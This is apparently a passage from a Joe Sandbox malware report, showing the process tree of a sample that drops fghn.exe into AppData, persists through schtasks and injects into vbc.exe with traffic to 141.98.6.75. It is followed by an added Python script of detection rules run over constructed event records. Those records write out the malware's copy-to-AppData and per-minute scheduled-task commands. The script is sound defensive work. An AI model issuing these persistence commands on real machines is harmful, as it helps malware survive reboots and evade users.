                            dropped: C:\Users\user\AppData\Roaming\fghn\fghn.exe (PE32); C:\Users\user\...\fghn.exe:Zone.Identifier (ASCII)
                            38 conhost.exe
                        24 cmd.exe (2)
                            signatures: Uses schtasks.exe or at.exe to add and modify task schedules
                            40 conhost.exe
                        26 cmd.exe (1)
                            42 conhost.exe
                            44 schtasks.exe (1)
                    11 fghn.exe (3)
                        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                        28 vbc.exe (3)
                            signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                        30 cmd.exe (1)
                            46 conhost.exe
                            48 schtasks.exe (1)
                        36 2 other processes
                            50 conhost.exe
                            52 conhost.exe
                    13 excel.exe (1)
                        signatures: Document exploit detected (process start blacklist hit); Injects files into Windows application
                        32 conhost.exe
                    15 excel.exe (1)
                        34 conhost.exe
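                  The chain in the behavior graph is what an endpoint detection would key on: the sample spawns cmd.exe, which drops fghn.exe under AppData\Roaming and registers it through schtasks.exe, and it injects into vbc.exe, which then carries the traffic to 141.98.6.75:80. The rules below are an added example and not part of the Joe Sandbox report; they run over constructed Sysmon-style process, file and network records whose field names, image paths and command lines are assumptions modelled on the graph (the report shows the tree, not the command lines; pids reuse the graph's node ids). Two benign records, a build spawning vbc.exe from MSBuild and a task pointing at Program Files, are included so the rules can be seen not to fire on them.

```python
"""Detection rules for the process chain in the behavior graph above.

Added example; not part of the Joe Sandbox report. The records below are
constructed Sysmon-style events: field names, paths, pids (taken from the
graph's node ids) and command lines are assumptions, since the report
shows the process tree but not the actual command lines.
"""
import re

EVENTS = [
    {"type": "process", "pid": 7, "ppid": 2,
     "image": r"C:\Users\user\Desktop\pdP5Rv9pPW.exe", "cmdline": "pdP5Rv9pPW.exe"},
    # cmd.exe (node 22) copies the sample to AppData\Roaming\fghn\fghn.exe
    {"type": "process", "pid": 22, "ppid": 7, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c copy /y pdP5Rv9pPW.exe "C:\Users\user\AppData\Roaming\fghn\fghn.exe"'},
    {"type": "file", "pid": 22, "path": r"C:\Users\user\AppData\Roaming\fghn\fghn.exe"},
    # cmd.exe (node 26) -> schtasks.exe (node 44) registers the dropped copy
    {"type": "process", "pid": 26, "ppid": 7, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c schtasks /create /f /tn fghn /tr "C:\Users\user\AppData\Roaming\fghn\fghn.exe" /sc minute /mo 1'},
    {"type": "process", "pid": 44, "ppid": 26, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /f /tn fghn /tr "C:\Users\user\AppData\Roaming\fghn\fghn.exe" /sc minute /mo 1'},
    # vbc.exe (node 17) is the injection target and carries the C2 traffic
    {"type": "process", "pid": 17, "ppid": 7,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe", "cmdline": "vbc.exe"},
    {"type": "network", "pid": 17, "dst_ip": "141.98.6.75", "dst_port": 80},
    # Benign controls: a build spawning vbc.exe from MSBuild, and a task for a Program Files binary
    {"type": "process", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "cmdline": "MSBuild.exe app.vbproj"},
    {"type": "process", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe", "cmdline": "vbc.exe /out:app.dll Module1.vb"},
    {"type": "process", "pid": 102, "ppid": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
]

# Locations a standard user can write to; anything launched or scheduled from here is suspect.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\[^\\]+\\(Desktop|Downloads|Documents)|Windows\\Temp)\\", re.I)
# .NET utilities commonly used as hollowed hosts; none of them needs Internet access.
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
# Extracts the task action given to schtasks /tr, quoted or not.
TR_ARG = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(procs, pid):
    """Walk ppid links and render the chain root > ... > pid for the alert."""
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return " > ".join(reversed(chain))


def detect(events):
    """Return (rule, pid, chain) tuples for every event matching a rule."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        p = procs.get(e["pid"])
        parent = procs.get(p["ppid"]) if p else None
        name = basename(p["image"]) if p else ""
        hit = None
        if e["type"] == "process":
            if name == "schtasks.exe" and "/create" in e["cmdline"].lower():
                # Rule 1: scheduled task whose action is a binary in a user-writable directory
                m = TR_ARG.search(e["cmdline"])
                if m and USER_WRITABLE.search(m.group(1)):
                    hit = "schtasks_user_writable_target"
            elif name in DOTNET_HOSTS and parent and USER_WRITABLE.search(parent["image"]):
                # Rule 2: .NET utility started by something running from a user-writable path
                hit = "dotnet_host_untrusted_parent"
        elif e["type"] == "file":
            # Rule 3: a shell spawned by an untrusted binary writes an executable under a user-writable path
            if (name == "cmd.exe" and parent and USER_WRITABLE.search(parent["image"])
                    and e["path"].lower().endswith(".exe") and USER_WRITABLE.search(e["path"])):
                hit = "shell_drops_exe_user_writable"
        elif e["type"] == "network" and name in DOTNET_HOSTS:
            # Rule 4: .NET compiler/registration host with an outbound connection
            hit = "dotnet_host_network"
        if hit:
            alerts.append((hit, e["pid"], ancestry(procs, e["pid"])))
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in detect(EVENTS):
        print(f"{rule:32} pid={pid:<4} {chain}")
```

                  Rules 2 and 4 together are the useful pair: a .NET compiler host launched by a binary in a user profile directory, and the same host opening a connection, is the hollowing pattern the report attributes to node 17, and neither fires on the MSBuild-driven build. Rule 1 parses the /tr action rather than matching on the bare presence of schtasks.exe, which is what keeps the Program Files task quiet.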
